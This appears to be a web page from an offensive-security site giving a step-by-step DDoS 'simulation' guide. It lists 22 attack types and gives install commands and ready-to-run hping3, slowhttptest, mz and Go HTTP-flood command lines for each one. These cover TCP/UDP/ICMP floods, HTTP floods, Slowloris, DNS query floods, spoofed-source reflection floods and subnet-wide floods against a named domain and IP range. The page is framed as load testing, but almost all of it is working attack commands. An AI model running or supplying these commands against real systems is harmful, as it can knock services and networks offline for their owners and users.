| No | DDoS Attack Type | DDoS Attack Details |
| 01-) | TCP SYN Flood | TCP SYN Port 443 |
| 02-) | TCP SYN Flood | TCP SYN Random Port |
| 03-) | TCP ACK Flood | TCP ACK Port 443 |
| 04-) | TCP SYN ACK Flood | TCP SYN ACK Port 443 |
| 05-) | TCP SYN ACK Flood | TCP SYN ACK Random Port |
| 06-) | TCP RST Flood | TCP RST Port 443 |
| 07-) | UDP Flood | UDP Port 53 |
| 08-) | UDP Flood | UDP Random Port |
| 09-) | HTTP Get Flood | |
| 10-) | HTTP Random Get Flood | |
| 11-) | HTTP Post Flood | |
| 12-) | SlowLoris | |
| 13-) | SlowBody | |
| 14-) | DNS Query Flood | Query offensivesecurity.org |
| 15-) | DNS Subdomain Query Flood | Query ***.offensivesecurity.org |
| 16-) | ICMP Flood | |
| 17-) | NTP Reflection | UDP Flood source port 123 |
| 18-) | SNMP Reflection | UDP Flood source port 161 |
| 19-) | SSDP Reflection | UDP Flood source port 1900 |
| 20-) | DNS Reflection | UDP Flood source port 53 |
| 21-) | TCP SYN Flood Attack to IP Subnet | TCP SYN Random Port |
| 22-) | UDP Flood Attack to IP Subnet | UDP Random Port |
Sample The Targets (Scenerio);
Target URL : https://offensivesecurity.org
Target IP : 192.168.1.10
Target Subnet : 192.168.1/24
Requirements
In order to simulate the appropriate types of DDoS attacks, the packages and tools listed in the requirements list below must be installed on the systems that will perform the DDoS attack.
sudo apt-get install python -y
sudo apt-get install python3 -y
sudo apt-get install git -y
sudo apt install golang-go -y
sudo apt-get install hping3 -y
sudo apt-get install slowhttptest -y
sudo apt-get install mz -y
git clone https://github.com/grafov/hulk
git clone https://github.com/Leeon123/golang-httpflood.githping3 Manual
We have prepared many of our DDoS attacks through the hping3 tool. Related Hping3 DDoS attack commands: the target to be attacked, the port, the source port for the attack type should be changed and edited according to information such as. For this reason, I share a small list below for some hping3 parameters that we use. I suggest you review the hping3 manual for the different types of DDoS attacks and attacks that will be prepared.
-s : Base Source Port
-p : Destination Port
-S : Set SYN Flag
-A : Set ACK Flag
-SA : Set SYN and ACK Flag
-R : Set RST Flag
--UDP : UDP Mode
--ICMP : ICMP Mode
--keep : Keep still Source Port
--rand-dest : Random Destination AddressDDoS attack types and related attack commands
01-) TCP SYN Flood (TCP SYN – Port 443)
hping3 --flood -S -p 443 offensivesecurity.org02-) TCP SYN Flood (TCP SYN – Random Port)
hping3 --flood -S -p ++443 offensivesecurity.org03-) TCP ACK Flood (TCP ACK – Port 443)
hping3 --flood -A -p 443 offensivesecurity.org04-) TCP SYN ACK Flood (TCP SYN ACK – Port 443)
hping3 --flood -SA -p 443 offensivesecurity.org05-) TCP SYN ACK Flood (TCP SYN ACK – Random Port)
hping3 --flood -SA -p ++80 offensivesecurity.org06-) TCP RST Flood (TCP RST – Port 443)
hping3 --flood -R -p 443 offensivesecurity.org07-) UDP Flood (UDP – Port 53)
hping3 --flood --udp -p 53 ns1.offensivesecurity.org08-) UDP Flood (UDP – Random Port)
hping3 --flood --udp -p ++53 ns1.offensivesecurity.org09-) HTTP Get Flood
cd golang-httpflood/ && yes | go run httpflood.go "https://offensivesecurity.org/" 1000 get 6000 nil10-) HTTP Random Get Flood
go run ./hulk/hulk.go -site "https://offensivesecurity.org/"11-) HTTP Post Flood
cd golang-httpflood/ && yes | go run httpflood.go "https://offensivesecurity.org/" 1000 post 6000 nil12-) SlowLoris
while true; do slowhttptest -H -c 60000 -i 8640000 -l 8640000 -r 10000 -s 10240 -x 24 -t GET -u "https://offensivesecurity.org/"; sleep 60; done;13-) SlowBody
while true; do slowhttptest -B -c 60000 -i 8640000 -l 8640000 -r 10000 -s 10240 -x 24 -t POST -u "https://offensivesecurity.org/"; sleep 60; done;14-) DNS Query Flood (Query – google.com)
mz -B ns1.offensivesecurity.org -t dns "q=google.com" -c 10000000000015-) DNS Subdomain Query Flood (Query – ***.offensivesecurity.org)
mz -B ns1.offensivesecurity.org -t dns "q=vpn.offensivesecurity.org" -c 100000000000 16-) ICMP Flood
hping3 --flood --icmp offensivesecurity.org17-) NTP Reflection/Amplification (UDP Flood Based – Source Port 123)
hping3 -s 123 --keep --flood --udp -p 443 offensivesecurity.org18-) SNMP Reflection/Amplification (UDP Flood Based – Source Port 161)
hping3 -s 161 --keep --flood --udp -p 443 offensivesecurity.org19-) SSDP Reflection/Amplification (UDP Flood Based – Source Port 1900)
hping3 -s 1900 --keep --flood --udp -p 53 ns1.offensivesecurity.org20-) DNS Reflection/Amplification Attack (UDP Flood Based – Source Port 53)
hping3 -s 53 --keep --flood --udp -p 53 ns1.offensivesecurity.orgAnd the attack commands that allow us to attack different IP addresses and different ports of the target system’S IP subnet, which are our favorite lethal weapon in our tests, are as follows. In the tests we conducted, we experienced different scenarios such as the following attacks and the fact that the main domain and all its subdomains became inaccessible at the same time.
21-) TCP SYN Flood Attack to IP Subnet (TCP SYN Based – Random Port)
hping3 --flood -S 192.168.0.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood -S 192.168.1.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood -S 192.168.2.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood -S 192.168.3.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;22-) UDP Flood Attack to IP Subnet (UDP Based – Random Port)
hping3 --flood --udp 192.168.0.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood --udp 192.168.1.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood --udp 192.168.2.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
hping3 --flood --udp 192.168.3.x --rand-dest -I eth0 -p ++1 >> /dev/null 2>&1;
English
Arabic
Chinese (Simplified)
Dutch
French
German
Italian
Portuguese
Russian
Spanish
Turkish